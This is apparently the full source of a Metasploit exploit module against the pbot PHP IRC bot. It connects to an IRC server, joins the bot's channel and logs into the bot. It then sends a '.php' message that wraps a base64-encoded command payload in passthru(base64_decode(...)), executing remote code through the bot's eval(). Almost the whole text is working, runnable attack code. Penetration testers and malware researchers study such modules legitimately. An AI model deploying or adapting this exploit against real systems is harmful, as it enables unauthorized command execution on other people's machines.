PHP IRC Bot pbot eval() Remote Code Execution

1. ##
2. # This file is part of the Metasploit Framework and may be subject to
3. # redistribution and commercial restrictions. Please see the Metasploit
4. # web site for more information on licensing and terms of use.
5. # http://metasploit.com/
6. ##
7.  
8. require 'msf/core'
9.  
10.  
11. class Metasploit3 < Msf::Exploit::Remote
12. Rank = ExcellentRanking
13.  
14. include Msf::Exploit::Remote::Tcp
15.  
16. def initialize(info = {})
17. super(update_info(info,
18. 'Name' => 'PHP IRC Bot pbot eval() Remote Code Execution',
19. 'Description' => %q{
20. This module allows remote command execution on the PHP IRC bot pbot by abusing
21. the usage of eval() in the implementation of the .php command. In order to work,
22. the data to connect to the IRC server and channel where find pbot must be provided.
23. The module has been successfully tested on the version of pbot analyzed by Jay
24. Turla, and published on Infosec Institute, running over Ubuntu 10.04 and Windows XP
25. SP3.
26. },
27. 'Author' =>
28. [
29. 'evilcry', # pbot analysis'
30. 'Jay Turla', # pbot analysis
31. '@bwallHatesTwits', # PoC
32. 'juan vazquez' # Metasploit module
33. ],
34. 'License' => MSF_LICENSE,
35. 'References' =>
36. [
37. [ 'EDB', '20168' ],
38. [ 'URL', 'http://offensivecomputing.net/?q=node/1417'],
39. [ 'URL', 'http://resources.infosecinstitute.com/pbot-analysis/']
40. ],
41. 'Platform' => [ 'unix', 'win'],
42. 'Arch' => ARCH_CMD,
43. 'Payload' =>
44. {
45. 'Space' => 344, # According to RFC 2812, the max length message is 512, including the cr-lf
46. 'BadChars' => '',
47. 'DisableNops' => true,
48. 'Compat' =>
49. {
50. 'PayloadType' => 'cmd',
51. }
52. },
53. 'Targets' =>
54. [
55. [ 'pbot', { } ]
56. ],
57. 'Privileged' => false,
58. 'DisclosureDate' => 'Nov 02 2009',
59. 'DefaultTarget' => 0))
60.  
61. register_options(
62. [
63. Opt::RPORT(6667),
64. OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
65. OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),
66. OptString.new('CHANNEL', [true, 'IRC Channel', '#channel']),
67. OptString.new('PBOT_PASSWORD', [false, 'pbot Password', ''])
68. ], self.class)
69. end
70.  
71. def check
72. connect
73.  
74. response = register(sock)
75. if response =~ /463/ or response =~ /464/
76. print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
77. return Exploit::CheckCode::Unknown
78. end
79.  
80. response = join(sock)
81. if not response =~ /353/ and not response =~ /366/
82. print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
83. return Exploit::CheckCode::Unknown
84. end
85. response = pbot_login(sock)
86. quit(sock)
87. disconnect
88.  
89. if response =~ /auth/ and response =~ /logged in/
90. return Exploit::CheckCode::Vulnerable
91. else
92. return Exploit::CheckCode::Safe
93. end
94. end
95.  
96. def send_msg(sock, data)
97. sock.put(data)
98. data = ""
99. begin
100. read_data = sock.get_once(-1, 1)
101. while not read_data.nil?
102. data << read_data
103. read_data = sock.get_once(-1, 1)
104. end
105. rescue EOFError
106. end
107. data
108. end
109.  
110. def register(sock)
111. msg = ""
112.  
113. if datastore['IRC_PASSWORD'] and not datastore['IRC_PASSWORD'].empty?
114. msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"
115. end
116.  
117. if datastore['NICK'].length > 9
118. nick = rand_text_alpha(9)
119. print_error("The nick is longer than 9 characters, using #{nick}")
120. else
121. nick = datastore['NICK']
122. end
123.  
124. msg << "NICK #{nick}\r\n"
125. msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"
126.  
127. response = send_msg(sock,msg)
128. return response
129. end
130.  
131. def join(sock)
132. join_msg = "JOIN #{datastore['CHANNEL']}\r\n"
133. response = send_msg(sock, join_msg)
134. return response
135. end
136.  
137. def pbot_login(sock)
138. login_msg = "PRIVMSG #{datastore['CHANNEL']} :.login"
139. if datastore['PBOT_PASSWORD'] and not datastore['PBOT_PASSWORD'].empty?
140. login_msg << " #{datastore['PBOT_PASSWORD']}"
141. end
142. login_msg << "\r\n"
143. response = send_msg(sock, login_msg)
144. return response
145. end
146.  
147. def pbot_command(sock)
148. encoded = Rex::Text.encode_base64(payload.encoded)
149. command_msg = "PRIVMSG #{datastore['CHANNEL']} :.php #{rand_text_alpha(1)} passthru(base64_decode(\"#{encoded}\"));\r\n"
150. response = send_msg(sock, command_msg)
151. return response
152. end
153.  
154. def quit(sock)
155. quit_msg = "QUIT :bye bye\r\n"
156. sock.put(quit_msg)
157. end
158.  
159. def exploit
160. connect
161.  
162. print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
163. response = register(sock)
164. if response =~ /463/ or response =~ /464/
165. print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
166. return
167. end
168.  
169. print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...")
170. response = join(sock)
171. if not response =~ /353/ and not response =~ /366/
172. print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
173. return
174. end
175.  
176. print_status("#{rhost}:#{rport} - Registering with the pbot...")
177. response = pbot_login(sock)
178. if not response =~ /auth/ or not response =~ /logged in/
179. print_error("#{rhost}:#{rport} - Error registering with the pbot")
180. return
181. end
182.  
183. print_status("#{rhost}:#{rport} - Exploiting the pbot...")
184. pbot_command(sock)
185.  
186. quit(sock)
187. disconnect
188. end
189. end